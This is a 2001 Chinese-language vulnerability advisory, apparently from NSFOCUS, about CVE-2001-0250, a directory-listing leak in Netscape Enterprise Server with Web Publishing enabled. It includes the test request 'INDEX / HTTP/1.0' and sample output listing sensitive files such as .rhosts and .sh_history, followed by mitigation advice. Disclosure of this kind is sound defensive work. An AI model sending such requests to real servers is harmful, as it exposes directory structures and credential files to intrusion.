首页 -> 安全研究
安全研究
安全漏洞
Netscape Enterprise Server INDEX请求目录信息泄露漏洞
发布日期:2001-01-24
更新日期:2001-01-24
受影响系统:
Netscape Enterprise Server 3.0描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Netscape Enterprise Server 4.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
BUGTRAQ ID: 2285
CVE(CAN) ID: CVE-2001-0250
Netscape Enterprise Server是一个使用比较广泛的Web站点服务器,运行于微软、大多数的UNIX以及Linux平台。现在已经被iPlanet Web Server替代。
如果Netscape Enterprise Server(NES)和iPlanet Web Server(iWS)的Web发布功能被激活,可能导致服务器信息泄露。
Netscape Enterprise Server在打开Web Publishering功能的情况下,通过使用telnet工具向服务器发送特殊的INDEX请求,服务器会显示服务器的目录结构。
<*来源:Security Research Team (security@relaygroup.com)
链接:http://www[dot]safermag[dot]com/advisories/0013.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
INDEX / HTTP/1.0
-- output start --
Trying 192.168.1.1...
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain
test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null
-- output end --
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭Web Publishering功能或关闭对于INDEX请求的处理。
厂商补丁:
Netscape
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本 :
http://www.netscape.com
浏览次数:3812
严重程度:0(网友投票)
绿盟科技给您安全的保障